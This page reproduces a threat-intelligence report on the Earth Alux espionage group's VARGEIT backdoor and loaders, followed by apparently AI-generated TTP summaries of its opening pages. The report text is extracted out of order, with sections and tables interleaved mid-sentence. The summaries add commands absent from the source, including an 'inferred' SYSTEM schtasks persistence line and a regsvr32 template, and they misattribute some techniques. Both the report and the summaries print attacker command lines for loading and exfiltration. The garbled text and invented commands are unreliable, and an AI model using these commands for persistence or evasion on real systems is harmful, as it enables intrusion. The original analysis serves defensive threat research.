The Espionage Toolkit of Earth Alux: A Closer Look at its Advanced Techniques

  • ChatGPT paged: Each PDF page to text, then ChatGPT 4o (detailed)
  • Gemini 2.0: Full PDF with gemini-2.0-flash (8k output token limit)
  • Gemini 2.5: Full PDF with gemini-2.5-flash-preview-05-20 (65k output tokens limit)
  • Original: All text extracted from PDF

Original Text

The Espionage Toolkit of Earth Alux A Closer Look at its Advanced Techniques By: Lenart Bermejo, Ted Lee, Theo Chen March 31, 2025 Read time: 13 min (3480 words) Key takeaways: Trend Research’s consistent monitoring and investigation efforts have uncovered Earth Alux’s stealthy activities and advanced techniques. One of the tools in the arsenal of this advanced persistent threat group (APT) is its primary backdoor, VARGEIT. Left undetected, the attack can maintain a foothold in the system and carry out cyberespionage. The long-term collection and exfiltration of data could lead to far-reaching consequences, such as disrupted operations and financial losses. The attacks are targeted toward the Asia-Pacific (APAC) and Latin American regions, hitting key sectors such as government, technology, logistics, manufacturing, telecommunications, IT services, and retail. Regular patching and updating, vigilant monitoring for any signs of compromise, and proactive protection can help prevent such threats from infiltrating organizations’ systems. The Earth Alux APT group’s schemes and tactics have been uncloaked through our relentless monitoring and investigation efforts. The China-linked intrusion set is actively launching cyberespionage attacks against the government, technology, logistics, manufacturing, telecommunications, IT services, and retail sectors. The first sighting of its activity was in the second quarter of 2023; back then, it was predominantly observed in the APAC region. Around the middle of 2024, it was also spotted in Latin America. Earth Alux has also been observed to conduct regular tests for some of its toolsets to ensure stealth and longevity in the target environment. Overview of an Earth Alux attack To gain entry into the system, Earth Alux mostly exploits vulnerable services in exposed servers. It then implants web shells such as GODZILLA to facilitate the delivery of its backdoors. It has mainly utilized VARGEIT as its primary backdoor and control tool, along with COBEACON. VARGEIT is used as a first, second, and/or later-stage backdoor, while COBEACON is employed as a first-stage backdoor. This is distinguishable in the way VARGEIT is loaded: the first stage utilizes loading via a debugger script using cdb.exe, while later stages use DLL sideloading, which can include execution guardrails and timestomping techniques via the RAILLOAD (loader component) and RAILSETTER (installation and timestomping tool). VARGEIT is also the chief method through which Earth Alux operates supplemental tools for various tasks, such as lateral movement and network discovery in a fileless manner. Among its various backdoor functions is the ability to load tools directly from its command-and- control (C&C) server to a spawned process of mspaint. As such, several mspaint processes can be observed performing tasks for the backdoor, including network reconnaissance, collection, and exfiltration. Figure 1. Overview of Earth Alux Earth Alux TTPs Earth Alux employs a variety of advanced tactics, techniques, and procedures (TTPs) to facilitate its scheme. Below is a detailed view of each phase of the attack: Initial access Earth Alux primarily utilizes vulnerable services in exposed servers for gaining initial access and for implanting web shells such as GODZILLA to allow delivery of its first-stage backdoors. Execution, persistence, and defense evasion Upon gaining control via the implanted webshell, Earth Alux installs a first-stage backdoor (either COBEACON or VARGEIT) via different loading methods. COBEACON Popular among many threat actors, COBEACON is also among the tools used by Earth Alux. It is primarily used as a first-stage backdoor and loaded as an encrypted payload of the DLL side- loaded MASQLOADER, or as a shellcode using RSBINJECT. COBEACON loader – MASQLOADER The first observed loading method used to execute COBEACON payloads is via MASQLOADER, a DLL side-loaded loader. This loader component decrypts its payload using a substitution cipher, where the encrypted payload contains 1-3 character strings that has a hex value equivalent based on MASQLOADER’s substitution table. Figure 2. MASQLOADER loading sequence Figure 3. Encrypted payload Figure 4. Substitution cipher array Later MASQLOADER versions also added an anti-API hooking technique. It does this by overwriting the code section of ntdll.dll in its memory space with the code section of ntdll.dll taken directly from the file, effectively overwriting any API hooks inserted by monitoring tools and security tools with the original code. This feature allows MASQLOADER and the injected payload to evade detections based on intercepted API calls from security software. Figure 5. Anti-API hooking of MASQLOADER Our telemetry suggests MASQLOADER is also being used by other groups besides Earth Alux. Additionally, the difference in MASQLOADER’s code structure compared to other tools such as RAILSETTER and RAILLOAD suggests that MASQLOADER’s development is separate from those toolsets. COBEACON loader – RSBINJECT Another tool used by Earth Alux to load COBEACON is RSBINJECT, a Rust-based command line shellcode loader. It does not have decryption routines and loads the shellcodes directly. Instead, it has other features that help test the shellcode using optional flags and subcommands. Figure 6. RSBINJECT flags and subcommands While RSBINJECT has been observed in attacks, its functionality suggests that it also doubles as a testing tool for shellcodes. Like MASQLOADER, this tool is likely not exclusive to Earth Alux. First stage VARGEIT execution – CDB First stage VARGEIT is executed via shellcode injection using debugger script. This method uses the cdb.exe (renamed as fontdrvhost.exe when dropped by the webshell) as the debugger and the host, running the script based on the LOLBAS method. The debugger script config.ini contains both a loader shellcode and the code for VARGEIT. This produces the following command line: C:\programdata\fontdrvhost.exe -cf c:\programdata\config.ini -o c:\programdata\fontdrvhost.exe This loading method is commonly used as the first-stage backdoor installation, delivered via the initial access methods typically involving exploitation of externally exposed servers, and is often observed to install second and later-stage VARGEIT. A variation of this loading method uses a shellcode, which loads an encrypted VARGEIT payload from a separate file component. Second stage VARGEIT execution – DLL side-loading Second stage VARGEIT is executed via DLL side-loading involving the RAILLOAD loader tool. This method is often used for second or later-stage installations and can have execution guardrails implemented via the said tool, as well as evasive measures via RAILSETTER. RAILLOAD as second stage VARGEIT loader RAILLOAD is a loader tool executed via DLL side-loading and is used for second-stage loading. Figure 7. RAILLOAD loading sequence This tool comes with its own configuration and has been seen to have a variety of payload components from either an encrypted file or a registry location. The RAILLOAD configuration is base64-encoded and contains information separated by “||”: File-based Configuration |||| Registry-based Configuration |||||| RAILLOAD decryption and execution guardrails RAILLOAD’s decryption routine uses base64 decoding followed by AES-128 CBC mode decryption. This can have execution guardrails in some variants. For example, if the config does not contain an AES key (can be left blank), RAILLOAD uses information from the infected machine’s registry as a decryption key. In older variants, the first 16 bytes of HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid is used, while on newer variants, the first 16 bytes of HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProductID is applied instead. Figure 8. RAILSETTER execution flow RAILSETTER has been designed to be loaded via regsvr32.exe. RAILSETTER’s host is also deployed similarly to how RAILLOAD’s host is a relocated and renamed copy of an already existing file in the system. In later incidents involving Earth Alux, RAILSETTER no longer lands as a file but is instead executed via VARGEIT’s mspaint injection method. Backdoor and Command & Control The majority of Earth Alux’s activities for these stages are handled using VARGEIT’s features, with one of them bringing in miscellaneous tools. As a multi-channel configurable backdoor, the following are its available channels, which are mostly for communication and can be set in the configuration: ID Channel 0x00 HTTP 0x01 Reverse TCP 0x02 Reverse UDP 0x03 Bind TCP 0x04 Bind HTTP 0x05 Outlook 0x06 ICMP 0x07 DNS 0x08 Web 0x09 Bind SMB Table 1. VARGEIT channels The Outlook channel, which utilizes Graph API , is predominantly used in all observed attacks. Later variants also include versions where the Outlook channel is the only option.
Graph API enables authorized access to a user's Outlook mail data, allowing email-related operations such as reading, sending, and managing emails, as well as accessing calendar events and contacts from primary and shared mailboxes. VARGEIT’s configuration can also vary depending on the channel used. The Outlook channel type configuration contains the following information: Offset Size Value RAILSETTER for persistence and timestomping RAILSETTER is a persistence installer component designed to work with RAILLOAD. Its main functions include: Copying and renaming RAILLOAD’s intended host from c:\windows\system32 to the intended target directory Timestomping RAILLOAD and its host’s create, access, and modify time Creating a scheduled task for persistence. RAILSETTER also has a base64-encoded configuration, which contains the information needed to perform its functions. The configuration is structured as follows: |||||||| |||||||| The component’s execution flow is illustrated below: 0x00 ~(up to 0x1388) Refresh token for MS Auth 0x1388 ~(up to 0xC8) URL for backup refresh token 0x1450 0x10 GUID used as registry data where (auth) token is stored 0x1478 0x02 Unknown ID added to communication message + 0x2B 0x147a 0x04 Unknown DW value 0x147e 0x01 Channel byte; decides which communication channel will be used 0x147f 0x10 AES-128 key used for message decryption/Encryption 0x148f 0x01 Flag to get external IP or not 0x1490 0x01 Unknown byte 0x1491 0x01 Exit byte 0x1492 0x04 Unknown DW value Table 2. VARGEIT Outlook channel type configuration In later versions of the backdoor, the URL for the backup refresh token and GUID used as registry data for auth token storage has been removed from the configuration, adjusting the offset location for the rest of the information. Using Graph API, the Outlook communication channel utilizes the draft folder for message exchanges between the backdoor and the controller. Backdoor messages are prepended with p_, while messages from the controller are prepended with r_. Messages processed by the backdoor are also deleted to remove tracks, and based on observation, the controller is also likely to have the same functionality: Figure 9. VARGEIT and controller interaction Server message The message from the C&C server is prepended with r_. A message ID allows the controller to keep track of the backdoor instance being controlled and enables the backdoor’s instance to identify which message it should read. The message ID is generated per backdoor instance using the fnv-1a x64 hash of a randomly generated GUID. The decimal equivalent of the fnv-1a x64 hash is used in the message title, while the hex equivalent is also embedded in the communication packet. The server message body contains the actual communication data, which is encrypted using AES-128 CBC mode and compressed using zlib. It is then stored as a base64-encoded string within the message body. Figure 10. Server message example Figure 11. Decoded message from the C&C server The base64-decoded layer has a header structure, and the actual encrypted data is in offset 0x2a: Offset Size Value 0x00 0x1e (First unboxed sequence) Randomly generated padding bytes 0x1e 0x04 (Boxed in red) Size of the ByteArray 0x22 0x08 (Boxed in yellow) messageID in hex 0x2a ~ (Boxed in black) Start of encrypted data Table 3. Communication header structure After decryption and decompression of the encrypted data, the message follows a specific structure: Offset Size Data 0x00 0x1e Randomly generated padding bytes 0x1e 0x04 Total size of the bytearray 0x22 0x01 Unknown communication flag A message with empty content has a value of 0x00 A message in response to collect message id has a value of 0x01 0x23 0x08 messageID in hex 0x2b 0x08 ID from config+0x1478 The ID from the config only has the size of WORD, but when sending communication to the server, the allocated size for this ID is in QW 0x33 ~ Start of the encrypted data to be sent Table 5. Decoded communication header structure The encrypted data has a structure that varies based on what command the backdoor is responding to. Figure 15. Decrypted data from the backdoor The example in the image above is a response to the system info collection command, and it shows information such as the username, computer name, external IP address, internal IP address, OS version, user admin flag, host process name, and host process ID. VARGEIT capabilities VARGEIT’s backdoor capabilities are as follows: Figure 12. Decrypted data from C&C offset Size Data 0x00 0x04 (First unboxed sequence) Size of the uncompressed message 0x04 0x04 (Boxed in red) Size of the remaining data passed as a parameter for the corresponding command’s function call 0x08 0x01 (Boxed in yellow) Command ID 0x09 0x08 (Boxed in black) Unknown 0x11 ~ (Boxed in white) Start of additional arguments (varies with command ID) Table 4. Decrypted communication data structure Figure 13. VARGEIT backdoor message example Figure 14. Decoded message from the backdoor It shares a similar structure with the server message, with some additional data in the message header block: Collect system information Communicate using different channels Interact with Windows Defender Firewall Collect drive information Collect running processes information Get, set, search, create, and delete directories Read and write to file Execute command lines Inject misc tools to a controlled mspaint or conhost instance Attackers use the mspaint injection to directly execute additional tools from the C&C server to the target machine without file landing. VARGEIT opens an instance of mspaint where a shellcode from the C&C server is to be injected. Code injection and execution use RtlCreateUserThread, VirtualAllocEx, and WriteProcessMemory. For command line tools, VARGEIT creates a pipe where the output can be read and sent back to the controller. For injected tools that require interaction, the backdoor uses the named pipe. Figure 16. Method 1: Executing the remote code Figure 18. Method 3: Interacting with the injected process via named pipe Discovery, collection, and exfiltration It is also worth noting that VARGEIT can launch multiple instances of MSPaint to host tools. Various activities can be performed in the stages of the attack: Installation In more recent attacks, Earth Alux has changed the deployment method of RAILSETTER, one of its persistence installation tools. After being deployed as a DLL file to be loaded via regsvr32.exe, this tool is executed via the mspaint method. Though there is no distinguishable argument in the mspaint process, the installation and timestomping behavior of RAILSETTER can be observed to come from it. Discovery Earth Alux deploys tools that appear to perform security event log and group policy discovery, as well as network/LDAP reconnaissance. An mspaint process performing a security event log and group policy discovery can show the following command line arguments: C:\Windows\System32\mspaint.exe Aslire597 An mspaint process performing network/LDAP reconnaissance can be seen with the following arguments: C:\Windows\System32\mspaint.exe sElf98RqkF ldap The network/LDAP reconnaissance process can also generate files containing network information. These are created inside a folder with the format \_\ (for example, c: \programdata\data\ad.domain.name_20241111062500). The following files can be created under this path: adcs.txt admin.keyword.users.txt all.dc.host.txt all.dns.record.txt all.exchange.host.txt all.gpo.txt all.group.user.txt Figure 17. Method 2: Reading the output of the tool via an anonymous pipe all.host.txt all.mssql.host.txt all.old.host.txt all.ou.txt all.spn.txt all.trusted.domain.txt all.trusted.txt all.user.workstations.host.txt all.users.txt as-rep_roasting.txt delegation.host.txt delegation.users.txt disabled.users.txt domain.admin.groups.txt domain.adminsdholder.users.txt locked.users.txt neverexpire.users.txt password_policy.txt unconstrained_delegation.host.txt unconstrained_delegation.users.txt These files are then archived under the data path (c:\programdata\data in the example), with the filename ad.domain.name_20241111062500.zip. Collection Earth Alux loads a possible custom compression tool to mspaint for collection purposes. The process has the following arguments and output for a compressed file (with the file extension .tar.gz): C:\Windows\System32\mspaint.exe Among the collected files are ones produced during the discovery stage. Exfiltration Earth Alux also deploys an exfiltration tool via this method to exfiltrate the compressed file created during the collection stage. Here, it displays the following arguments: C:\Windows\System32\mspaint.exe gWgGfsq1PcUUoo dm9TTlEwM0NXRkF3TXRkM3RVSHg3SGQ3TDl4YVNRNGY= It is interesting to note that the exfiltrated data is sent to an attacker-controlled cloud storage bucket. Based on our telemetry, Earth Alux has used the same cloud storage bucket to exfiltrate from different targets. Testing and development Earth Alux conducts several tests with RAILLOAD and RAILSETTER. These include detection tests and attempts to find new hosts for DLL side-loading. DLL side-loading tests involve ZeroEye, an open source tool popular within the Chinese-speaking community, for scanning EXE files’ import tables for imported DLLs that can be abused for side- loading. Figure 19. Command line version options Figure 20. Scan result software and modify the pinpointed codes to bypass file-based detections. Target industries Earth Alux has predominantly targeted a diverse array of sectors, namely government, technology, logistics, manufacturing, telecommunications, IT services, and retail, reflecting its strategic focus on high-value and sensitive information across different industries. The group's activities have primarily been observed in the APAC region, specifically affecting countries such as Thailand, the Philippines, Malaysia, and Taiwan. In mid-2024, Earth Alux extended its operations to Latin America, with notable incidents reported in Brazil. Conclusion and security recommendations Earth Alux represents a sophisticated and evolving cyberespionage threat, leveraging a diverse toolkit and advanced techniques to infiltrate and compromise a range of sectors, particularly in the APAC region and Latin America. Its reliance on the VARGEIT backdoor, along with the use of COBEACON and various loading methods, highlights a strategic approach to maintaining stealth and persistence within target environments. The group's ongoing testing and development of its tools further indicate a commitment to refining its capabilities and evading detection. Understanding the operational methods associated with Earth Alux is crucial for developing effective defenses and mitigating the risks posed by such advanced cyber threats. To bolster protection against APT attacks, organizations can adopt a proactive security mindset by implementing security best practices such as the following: Periodically patch and update systems used, as attackers can take advantage of vulnerabilities to gain initial access. Perform vigilant monitoring to observe any unusual activity such as an uncommonly heavy network activity, reduced performance and speed, and so on. Leverage solutions that help organizations take a proactive security stance and manage security holistically with comprehensive prevention, detection, and response capabilities. As organizations continue to face the challenges posed by Earth Alux, it is imperative to enhance their cybersecurity measures, adopt proactive threat detection strategies, and remain vigilant against the evolving tactics of this persistent adversary. Proactive security with Trend Vision One™ Trend Vision One™ is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure management, security operations, and robust layered protection. This comprehensive approach helps you predict and prevent threats, accelerating proactive security Figure 21. Qualified candidate output Earth Alux pairs ZeroEye with CloneExportTable, a tool used to clone the export table of a specified DLL into the export table of the DLL that is used for side-loading. Use of this tool usually involves cloning the desired DLL’s export table into RAILLOAD samples. Figure 22. CloneExportTable command Figure 23. Example of resulting export table Earth Alux also used VirTest, another testing tool popular among the Chinese-speaking community, for detection testing purposes and to enhance their toolsets’ evasive features. Figure 24. VirTest tool VirTest allows users to pinpoint codes in their tools that cause file-based detections from security outcomes across your entire digital estate. Backed by decades of cybersecurity leadership and Trend Cybertron, the industry's first proactive cybersecurity AI, it delivers proven results: a 92% reduction in ransomware risk and a 99% reduction in detection time. Security leaders can benchmark their posture and showcase continuous improvement to stakeholders. With Trend Vision One, you’re enabled to eliminate security blind spots, focus on what matters most, and elevate security into a strategic partner for innovation. Trend Vision One Threat Intelligence To stay ahead of evolving threats, Trend Vision One customers can access a range of Intelligence Reports and Threat Insights. Threat Insights helps customers stay ahead of cyber threats before they happen and allows them to prepare for emerging threats by offering comprehensive information on threat actors, their malicious activities, and their techniques. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and effectively respond to threats. Trend Vision One Intelligence Reports App [IOC Sweeping] The Espionage Toolkit of Earth Alux: A Closer Look at its Advanced Techniques Trend Vision One Threat Insights App Threat Actor: Earth Alux Emerging Threat: The Espionage Toolkit of Earth Alux: A Closer Look at its Advanced Techniques Hunting Queries Trend Vision One Search App Trend Vision One customers can use the Search App to match or hunt for the malicious indicators mentioned in this blog post with data in their environment. Earth Alux Malware malName: (VARGEIT OR RAILLOAD OR RAILSETTER) AND eventName: MALWARE_DETECTION More hunting queries are available for Trend Vision One customers with Threat Insights Entitlement enabled. Indicators of Compromise (IoC) The indicators of compromise for this entry can be found here: Tags
Original Text ChatGPT 4o Paged

The Espionage Toolkit of Earth Alux A Closer Look at its Advanced Techniques By: Lenart Bermejo, Ted Lee, Theo Chen March 31, 2025 Read time: 13 min (3480 words) Key takeaways: Trend Research’s consistent monitoring and investigation efforts have uncovered Earth Alux’s stealthy activities and advanced techniques. One of the tools in the arsenal of this advanced persistent threat group (APT) is its primary backdoor, VARGEIT. Left undetected, the attack can maintain a foothold in the system and carry out cyberespionage. The long-term collection and exfiltration of data could lead to far-reaching consequences, such as disrupted operations and financial losses. The attacks are targeted toward the Asia-Pacific (APAC) and Latin American regions, hitting key sectors such as government, technology, logistics, manufacturing, telecommunications, IT services, and retail. Regular patching and updating, vigilant monitoring for any signs of compromise, and proactive protection can help prevent such threats from infiltrating organizations’ systems. The Earth Alux APT group’s schemes and tactics have been uncloaked through our relentless monitoring and investigation efforts. The China-linked intrusion set is actively launching cyberespionage attacks against the government, technology, logistics, manufacturing, telecommunications, IT services, and retail sectors. The first sighting of its activity was in the second quarter of 2023; back then, it was predominantly observed in the APAC region. Around the middle of 2024, it was also spotted in Latin America. Earth Alux has also been observed to conduct regular tests for some of its toolsets to ensure stealth and longevity in the target environment. Overview of an Earth Alux attack To gain entry into the system, Earth Alux mostly exploits vulnerable services in exposed servers. It then implants web shells such as GODZILLA to facilitate the delivery of its backdoors. It has mainly utilized VARGEIT as its primary backdoor and control tool, along with COBEACON. VARGEIT is used as a first, second, and/or later-stage backdoor, while COBEACON is employed as a first-stage backdoor. This is distinguishable in the way VARGEIT is loaded: the first stage utilizes loading via a debugger script using cdb.exe, while later stages use DLL sideloading, which can include execution

Phase: Initial Access

  • Technique: Exploitation of Vulnerable Services
  • Procedure: The attackers exploit vulnerabilities in exposed servers to gain initial access.

Phase: Execution

  • Technique: Web Shell Execution
  • Tool: GODZILLA Web Shell
  • Procedure: Implantation of web shells like GODZILLA to facilitate backdoor delivery.

Phase: Execution (Backdoor Deployment)

  • Technique: Backdoor Deployment
  • Primary Tool: VARGEIT
  • Secondary Tool: COBEACON
  • Procedure: Deploy VARGEIT and COBEACON as first-stage backdoors.

Phase: Persistence

  • Technique: Scripted Debugger Loading
  • Command: cdb.exe
  • Procedure: Use of a debugger script via cdb.exe to load VARGEIT in the first stage.

Phase: Persistence

  • Technique: DLL Sideloading
  • Procedure: Later stages of VARGEIT are executed using DLL sideloading techniques.

Phase: Command and Control

  • Technique: Use of Backdoors for C2
  • Procedure: Maintain communication and control through VARGEIT and COBEACON backdoors.

guardrails and timestomping techniques via the RAILLOAD (loader component) and RAILSETTER (installation and timestomping tool). VARGEIT is also the chief method through which Earth Alux operates supplemental tools for various tasks, such as lateral movement and network discovery in a fileless manner. Among its various backdoor functions is the ability to load tools directly from its command-and- control (C&C) server to a spawned process of mspaint. As such, several mspaint processes can be observed performing tasks for the backdoor, including network reconnaissance, collection, and exfiltration. Figure 1. Overview of Earth Alux Earth Alux TTPs Earth Alux employs a variety of advanced tactics, techniques, and procedures (TTPs) to facilitate its scheme. Below is a detailed view of each phase of the attack: Initial access Earth Alux primarily utilizes vulnerable services in exposed servers for gaining initial access and for implanting web shells such as GODZILLA to allow delivery of its first-stage backdoors.

Phase: Initial Access

  • Technique: Exploitation of Vulnerable Services
  • Procedure: Exploit vulnerabilities in exposed server services to gain access and implant web shells like GODZILLA for delivering first-stage backdoors.

Phase: Execution

  • Technique: Fileless Execution via MSPaint
  • Procedure: Use VARGEIT to load tools directly from the C&C server into spawned MSPaint processes for execution tasks.

Phase: Persistence

  • Technique: Timestomping
  • Tool: RAILSETTER
  • Procedure: Utilize RAILSETTER to modify timestamps of files for evading detection and ensuring persistence.

Phase: Defense Evasion

  • Technique: Guardrails
  • Tool: RAILLOAD
  • Procedure: Use RAILLOAD as a loader component with guardrails to restrict execution to specific environments or conditions.

Phase: Lateral Movement

  • Technique: Fileless Lateral Movement
  • Tool: VARGEIT
  • Procedure: Employ VARGEIT for fileless execution of supplemental tools to facilitate lateral movement across compromised network systems.

Phase: Network Discovery

  • Technique: Reconnaissance via MSPaint
  • Procedure: Utilize spawned MSPaint processes to perform network reconnaissance tasks stealthily.

Phase: Collection and Exfiltration

  • Technique: Data Collection and Exfiltration via MSPaint
  • Procedure: Leverage MSPaint processes to collect and exfiltrate data to the C&C server.

Execution, persistence, and defense evasion Upon gaining control via the implanted webshell, Earth Alux installs a first-stage backdoor (either COBEACON or VARGEIT) via different loading methods. COBEACON Popular among many threat actors, COBEACON is also among the tools used by Earth Alux. It is primarily used as a first-stage backdoor and loaded as an encrypted payload of the DLL side- loaded MASQLOADER, or as a shellcode using RSBINJECT. COBEACON loader – MASQLOADER The first observed loading method used to execute COBEACON payloads is via MASQLOADER, a DLL side-loaded loader. This loader component decrypts its payload using a substitution cipher, where the encrypted payload contains 1-3 character strings that has a hex value equivalent based on MASQLOADER’s substitution table. Figure 2. MASQLOADER loading sequence Figure 3. Encrypted payload

Phase: Execution

  • Technique: DLL Side-Loading with MASQLOADER

  • Procedure: The threat actor uses MASQLOADER as a DLL side-loaded loader to decrypt and execute COBEACON payloads. The encrypted payload is decrypted using a substitution cipher based on MASQLOADER's substitution table.

  • Technique: Shellcode Injection with RSBINJECT

  • Procedure: COBEACON is loaded as shellcode using RSBINJECT.

Phase: Persistence

  • The report does not specify detailed steps, but based on the involvement of backdoors like COBEACON, it is likely that persistence may be achieved through scheduled tasks, registry modifications, or similar methods commonly used for establishing footholds.

Phase: Defense Evasion

  • Technique: Encrypted Payloads

  • Procedure: Use of encryption in the payload (substitution cipher) to evade detection and analysis.

  • Technique: DLL Side-Loading

  • Procedure: Utilization of a legitimate-looking DLL (MASQLOADER) to mask the execution of malicious payloads.

Figure 4. Substitution cipher array Later MASQLOADER versions also added an anti-API hooking technique. It does this by overwriting the code section of ntdll.dll in its memory space with the code section of ntdll.dll taken directly from the file, effectively overwriting any API hooks inserted by monitoring tools and security tools with the original code. This feature allows MASQLOADER and the injected payload to evade detections based on intercepted API calls from security software. Figure 5. Anti-API hooking of MASQLOADER Our telemetry suggests MASQLOADER is also being used by other groups besides Earth Alux. Additionally, the difference in MASQLOADER’s code structure compared to other tools such as RAILSETTER and RAILLOAD suggests that MASQLOADER’s development is separate from those toolsets. COBEACON loader – RSBINJECT Another tool used by Earth Alux to load COBEACON is RSBINJECT, a Rust-based command line shellcode loader. It does not have decryption routines and loads the shellcodes directly. Instead, it has other features that help test the shellcode using optional flags and subcommands.

Phase: Defense Evasion

  • Technique: Anti-API Hooking
  • Procedure: Overwriting the code section of ntdll.dll in memory with the original code from the file to bypass API hooks used by security tools.

Phase: Execution

  • Tool: RSBINJECT
  • Procedure: Rust-based command line shellcode loader. It allows loading shellcodes directly without decryption, using optional flags and subcommands to test the shellcode.

Figure 6. RSBINJECT flags and subcommands While RSBINJECT has been observed in attacks, its functionality suggests that it also doubles as a testing tool for shellcodes. Like MASQLOADER, this tool is likely not exclusive to Earth Alux. First stage VARGEIT execution – CDB First stage VARGEIT is executed via shellcode injection using debugger script. This method uses the cdb.exe (renamed as fontdrvhost.exe when dropped by the webshell) as the debugger and the host, running the script based on the LOLBAS method. The debugger script config.ini contains both a loader shellcode and the code for VARGEIT. This produces the following command line: C:\programdata\fontdrvhost.exe -cf c:\programdata\config.ini -o c:\programdata\fontdrvhost.exe This loading method is commonly used as the first-stage backdoor installation, delivered via the initial access methods typically involving exploitation of externally exposed servers, and is often observed to install second and later-stage VARGEIT. A variation of this loading method uses a shellcode, which loads an encrypted VARGEIT payload from a separate file component. Second stage VARGEIT execution – DLL side-loading Second stage VARGEIT is executed via DLL side-loading involving the RAILLOAD loader tool. This method is often used for second or later-stage installations and can have execution guardrails implemented via the said tool, as well as evasive measures via RAILSETTER. RAILLOAD as second stage VARGEIT loader RAILLOAD is a loader tool executed via DLL side-loading and is used for second-stage loading.

Phase: Initial Access

  • Technique: Exploitation of Public-Facing Application
  • Procedure: Threat actor exploits vulnerabilities in externally exposed servers to gain initial access.

Phase: Execution

  • Technique: Shellcode Injection via Debugger Script (CDB Method)
  • Command: C:\programdata\fontdrvhost.exe -cf c:\programdata\config.ini -o c:\programdata\fontdrvhost.exe
  • Details: Uses cdb.exe (renamed as fontdrvhost.exe) to execute debugger script config.ini containing loader shellcode and VARGEIT code. This is part of the LOLBAS method for executing first-stage backdoor installation.

Phase: Execution (Alternate Method)

  • Technique: Shellcode Loading of Encrypted Payload
  • Procedure: A shellcode variation loads an encrypted VARGEIT payload from a separate file component.

Phase: Execution (Second Stage)

  • Technique: DLL Side-Loading
  • Procedure: Second stage VARGEIT is executed through DLL side-loading using the RAILLOAD tool.

Phase: Evasion

  • Technique: Execution Guardrails and Evasive Measures
  • Tools: RAILLOAD and RAILSETTER
  • Details: RAILLOAD executes second-stage loading while RAILSETTER implements execution guardrails and evasive tactics.

Figure 7. RAILLOAD loading sequence This tool comes with its own configuration and has been seen to have a variety of payload components from either an encrypted file or a registry location. The RAILLOAD configuration is base64-encoded and contains information separated by “||”: File-based Configuration |||| Registry-based Configuration |||||| RAILLOAD decryption and execution guardrails RAILLOAD’s decryption routine uses base64 decoding followed by AES-128 CBC mode decryption. This can have execution guardrails in some variants. For example, if the config does not contain an AES key (can be left blank), RAILLOAD uses information from the infected machine’s registry as a decryption key. In older variants, the first 16 bytes of HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid is used, while on newer variants, the first 16 bytes of HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProductID is applied instead.

Phase: Initial Payload Configuration

  • Technique: File or Registry-Based Configuration Loading
  • Procedure: RAILLOAD extracts configuration details from either an encrypted file or registry location. The configuration includes paths, AES keys, and filenames.

Phase: Decryption and Execution

  • Technique: Base64 Decoding and AES-128 CBC Mode Decryption

  • Procedure: RAILLOAD decodes the base64 encoded configuration and decrypts it using AES-128 CBC mode. Execution guardrails may be present, relying on specific host information as a decryption key if no AES key is provided.

  • Variant-Specific Decryption Key:

  • Older Variants: First 16 bytes of HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid
  • Newer Variants: First 16 bytes of HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProductID

Figure 8. RAILSETTER execution flow RAILSETTER has been designed to be loaded via regsvr32.exe. RAILSETTER’s host is also deployed similarly to how RAILLOAD’s host is a relocated and renamed copy of an already existing file in the system. In later incidents involving Earth Alux, RAILSETTER no longer lands as a file but is instead executed via VARGEIT’s mspaint injection method. Backdoor and Command & Control The majority of Earth Alux’s activities for these stages are handled using VARGEIT’s features, with one of them bringing in miscellaneous tools. As a multi-channel configurable backdoor, the following are its available channels, which are mostly for communication and can be set in the configuration: ID Channel 0x00 HTTP 0x01 Reverse TCP 0x02 Reverse UDP 0x03 Bind TCP 0x04 Bind HTTP 0x05 Outlook 0x06 ICMP 0x07 DNS 0x08 Web 0x09 Bind SMB Table 1. VARGEIT channels The Outlook channel, which utilizes Graph API , is predominantly used in all observed attacks. Later variants also include versions where the Outlook channel is the only option.
Graph API enables authorized access to a user's Outlook mail data, allowing email-related operations such as reading, sending, and managing emails, as well as accessing calendar events and contacts from primary and shared mailboxes. VARGEIT’s configuration can also vary depending on the channel used. The Outlook channel type configuration contains the following information: Offset Size Value

Phase: Execution

  • Technique: DLL Side-Loading via regsvr32
  • Command: regsvr32.exe /s /n /i:<parameters> <path_to_RAILSETTER>

Phase: Execution (Alternative Method)

  • Technique: Process Injection
  • Procedure: RAILSETTER is injected into MSPaint via VARGEIT's mspaint injection method.

Phase: Command and Control

  • Technique: Multi-Channel Backdoor Configuration

  • Channels:

    • HTTP
    • Reverse TCP
    • Reverse UDP
    • Bind TCP
    • Bind HTTP
    • Outlook (Graph API)
    • ICMP
    • DNS
    • Web
    • Bind SMB

  • Details:

  • Primary usage of the Outlook channel, leveraging Graph API for email and calendar data access and manipulation.
  • Configuration varies based on the communication channel selected, focusing on Outlook for read/send email capabilities.

Additional Observations

  • Technique: Relocation and Renaming of Executable Files
  • Procedure: Executables are moved and renamed similarly to existing files for stealth.

RAILSETTER for persistence and timestomping RAILSETTER is a persistence installer component designed to work with RAILLOAD. Its main functions include: Copying and renaming RAILLOAD’s intended host from c:\windows\system32 to the intended target directory Timestomping RAILLOAD and its host’s create, access, and modify time Creating a scheduled task for persistence. RAILSETTER also has a base64-encoded configuration, which contains the information needed to perform its functions. The configuration is structured as follows: |||||||| |||||||| The component’s execution flow is illustrated below:

Phase: Persistence

  • Technique: File Copy and Rename

  • Procedure: Copy RAILLOAD from c:\windows\system32 to a target directory specified in the configuration. The file is renamed as part of this process.

  • Technique: Timestomping

  • Procedure: Modify the create, access, and modify timestamps of both RAILLOAD and its host file to a specified date.

  • Technique: Scheduled Task Creation

  • Command: Example inferred command based on the description: shell schtasks /create /tn "<Scheduled task>" /tr "<host destination and new filename>" /sc once /st <Scheduled Task Trigger Time> /ru SYSTEM /f

  • Description: The task is created with a specific description and is set to trigger at the defined time.

  • Technique: Encoded Configuration Use

  • Procedure: Decode a base64-encoded configuration to retrieve instructions for execution, involving the target host, timestomping information, and scheduled task details.

This structured approach captures the key elements and sequences that can help a red team emulate this specific persistence mechanism used by RAILSETTER.

